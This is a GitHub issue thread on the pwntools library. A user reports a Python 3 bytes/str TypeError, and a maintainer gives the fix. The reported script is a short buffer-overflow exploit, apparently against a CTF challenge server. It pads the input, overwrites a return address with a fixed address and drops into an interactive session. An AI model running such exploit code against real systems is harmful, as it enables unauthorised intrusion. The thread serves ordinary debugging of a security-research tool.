### ISSUE TITLE
TypeError: can only concatenate str (not "bytes") to str

### ISSUE THREAD

**Issue by qooloop** [Gallopsled/pwntools#1670]
# Pwntools Issue Template

When I run under python3, it will report an error   :TypeError: can only concatenate str (not "bytes") to str
But it is normal to run under python2

`from pwn import *

r = remote('220.249.52.133',38137)

r.recvuntil('Your choice:')
r.sendline('1')

r.recvuntil('username:\n')
r.sendline('hello')

sys_addr = 0x804868b

payload = 'a' * 0x18 + p32(sys_addr) + 'a' * 234

r.recvuntil('passwd:\n')
r.sendline(payload)

r.interactive()`

**Comment by Arusekk** [comment]
The error message couldn't be clearer :)
```py
payload = b'a' * 0x18 + p32(sys_addr) + b'a' * 234
```
